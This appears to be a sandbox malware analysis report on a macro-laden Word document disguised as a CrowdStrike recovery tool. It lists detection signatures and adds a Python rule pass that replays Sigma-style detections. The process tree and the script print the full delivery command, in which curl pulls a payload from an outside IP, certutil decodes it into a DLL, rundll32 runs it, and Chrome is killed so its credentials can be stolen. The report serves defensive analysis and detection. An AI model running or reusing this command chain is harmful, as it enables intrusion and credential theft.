Windows
Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contains functionality to steal Chrome passwords or cookies
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes
Classification
- System is w10x64
- WINWORD.EXE (PID: 2156 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  - cmd.exe (PID: 3916 cmdline: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - xcopy.exe (PID: 5308 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C)
  - certutil.exe (PID: 2496 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
  - certutil.exe (PID: 3552 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
  - curl.exe (PID: 2784 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
  - certutil.exe (PID: 2496 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
  - rundll32.exe (PID: 5068 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: 889B99C52A60DD49227C5E485A016679)
  - rundll32.exe (PID: 3992 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
  - cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - taskkill.exe (PID: 2144 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- chrome.exe (PID: 7612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  - chrome.exe (PID: 7792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- chrome.exe (PID: 2716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- WINWORD.EXE (PID: 3856 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  - cmd.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - xcopy.exe (PID: 7500 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C)
  - certutil.exe (PID: 7576 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
  - certutil.exe (PID: 4820 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
  - curl.exe (PID: 8092 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
  - certutil.exe (PID: 8116 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
  - rundll32.exe (PID: 5208 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: 889B99C52A60DD49227C5E485A016679)
  - rundll32.exe (PID: 5940 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
  - cmd.exe (PID: 2540 cmdline: C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - taskkill.exe (PID: 5680 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
- cleanup
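The cmd.exe command line in the tree above is the entire delivery chain in one shot: xcopy copies curl.exe out of System32 into the user's Temp directory, certutil round-trips it through base64 so that certutil rather than xcopy is the writer of the final curl.exe, the copied curl fetches payload2.txt from 172.104.160.126:8099, certutil decodes that text into mscorsvc.dll, the intermediates are deleted, and rundll32 loads the DLL by calling DllMain; the DLL then kills Chrome so its credential store can be read. The Python below is an added example for this report, not Joe Sandbox's, Sigma's or any vendor's detection code. It replays the logic behind the Sigma signatures listed above (Suspicious Microsoft Office Child Process, Suspicious Copy From or To System Directory) together with per-step rules for certutil -decode, curl writing to Temp, rundll32 loading from Temp and taskkill against a browser, over constructed Sysmon Event ID 1 style records built from the second WINWORD.EXE tree. The record layout, the parent/child links and the image paths of the system binaries are assumptions, since the report flattens the tree; the notepad record is constructed benign noise.

```python
"""Rule pass over process-creation events for the Office -> cmd -> certutil/curl -> rundll32 chain.

Added example for this sandbox report; not Joe Sandbox, Sigma or vendor code. Records use an
assumed Sysmon Event ID 1 style layout (pid, ppid, image, cmdline). Command lines, PIDs and the
download URL are taken from the report's second WINWORD.EXE tree; parent/child links and the
image paths of system binaries are assumptions. The notepad record is constructed benign noise.
"""
import re

T = r"C:\Users\user\AppData\Local\Temp"  # user temp directory as seen in the report
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "curl.exe", "bitsadmin.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\b", re.I)
SYS_RE = re.compile(r"\\Windows\\(?:System32|SysWOW64)\\", re.I)
SEVERITY = ["low", "medium", "high", "critical"]

EVENTS = [  # constructed records; ppid links are assumed
    {"pid": 3856, "ppid": 1, "image": r"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding'},
    {"pid": 6464, "ppid": 3856, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": rf"C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe {T} & certutil -f -encode "
                rf"{T}\curl.exe {T}\curl.txt & certutil -f -decode {T}\curl.txt {T}\curl.exe & {T}\curl.exe "
                rf"http://172.104.160.126:8099/payload2.txt -o {T}\mscorsvc.txt & certutil -f -decode "
                rf"{T}\mscorsvc.txt {T}\mscorsvc.dll & del {T}\curl.exe & del {T}\curl.txt & del {T}\mscorsvc.txt "
                rf'& START " " rundll32 {T}\mscorsvc.dll,DllMain & exit'},
    {"pid": 7072, "ppid": 6464, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 7500, "ppid": 6464, "image": r"C:\Windows\SysWOW64\xcopy.exe",
     "cmdline": rf"xcopy C:\Windows\System32\curl.exe {T}"},
    {"pid": 7576, "ppid": 6464, "image": r"C:\Windows\SysWOW64\certutil.exe",
     "cmdline": rf"certutil -f -encode {T}\curl.exe {T}\curl.txt"},
    {"pid": 4820, "ppid": 6464, "image": r"C:\Windows\SysWOW64\certutil.exe",
     "cmdline": rf"certutil -f -decode {T}\curl.txt {T}\curl.exe"},
    {"pid": 8092, "ppid": 6464, "image": rf"{T}\curl.exe",
     "cmdline": rf"{T}\curl.exe http://172.104.160.126:8099/payload2.txt -o {T}\mscorsvc.txt"},
    {"pid": 8116, "ppid": 6464, "image": r"C:\Windows\SysWOW64\certutil.exe",
     "cmdline": rf"certutil -f -decode {T}\mscorsvc.txt {T}\mscorsvc.dll"},
    {"pid": 5208, "ppid": 6464, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": rf"rundll32 {T}\mscorsvc.dll,DllMain"},
    {"pid": 5940, "ppid": 5208, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": rf"rundll32 {T}\mscorsvc.dll,DllMain"},
    {"pid": 2540, "ppid": 5940, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe"},
    {"pid": 5680, "ppid": 2540, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": r"taskkill /F /IM chrome.exe"},
    {"pid": 4100, "ppid": 1, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\user\Documents\notes.txt"},
]


def basename(path):
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid):
    """Image basenames up the parent chain, nearest first; stops at unknown pids or cycles."""
    seen = {pid}
    while (pid := by_pid[pid]["ppid"]) in by_pid and pid not in seen:
        seen.add(pid)
        yield basename(by_pid[pid]["image"])


def evaluate(events):
    """One hit dict per (event, rule) match, in event order."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""

        def hit(rule, sev):
            hits.append({"pid": e["pid"], "image": img, "rule": rule, "severity": sev})

        if pimg in OFFICE and img in LOLBINS:  # Sigma: Suspicious Microsoft Office Child Process
            hit("office_child_process", "high")
        if img in {"xcopy.exe", "robocopy.exe"} and SYS_RE.search(cmd) and re.search(r"\\Users\\", cmd, re.I):
            hit("copy_from_system_dir", "medium")  # Sigma: Suspicious Copy From or To System Directory
        if img == "certutil.exe" and re.search(r"\s-decode(?:\s|$)", cmd, re.I):
            target = cmd.split()[-1].lower()  # decoding straight into a PE is the high-confidence form
            hit("certutil_decode", "high" if target.endswith((".exe", ".dll")) else "medium")
        out = re.search(r"\s(?:-o|--output)\s+(\S+)", cmd)
        if img in DOWNLOADERS and re.search(r"https?://", cmd, re.I) and out and TEMP_RE.search(out.group(1)):
            hit("download_to_temp", "high")  # downloader writing its output into the user temp directory
        if TEMP_RE.search(e["image"]):
            hit("execution_from_temp", "medium")  # any binary executing from the user temp directory
        if img == "rundll32.exe" and TEMP_RE.search(cmd):
            hit("rundll32_from_temp", "high")
            if any(a in OFFICE for a in ancestors(by_pid, e["pid"])):
                hit("office_to_rundll32_chain", "critical")  # Office ancestor -> DLL loaded from temp
        if img == "taskkill.exe" and any(b in cmd.lower() for b in BROWSERS):
            hit("browser_killed", "medium")  # browser killed so its credential store can be read
    return hits


def verdict(hits):
    """Highest severity across hits, or 'clean' when nothing fired."""
    return max((h["severity"] for h in hits), key=SEVERITY.index, default="clean")


if __name__ == "__main__":
    for h in evaluate(EVENTS):
        print(f'{h["severity"]:8} pid={h["pid"]:<5} {h["image"]:13} {h["rule"]}')
    print("verdict:", verdict(evaluate(EVENTS)))
```

Run as a script it lists eleven hits and a critical verdict. The single-event rules (certutil -decode into a PE, a downloader writing into Temp, rundll32 loading from Temp, taskkill against a browser) each fire on their own at medium or high, which is also all a stateless Sigma rule can do; the ancestry walk is what ties both rundll32 instances back to WINWORD.EXE and turns the individually noisy hits into the document-driven chain the report describes. The benign notepad record produces nothing.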
No configs have been found
No yara matches
System Summary
Source | Author
---|---
 | frack113, Florian Roth (Nextron Systems)
 | Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io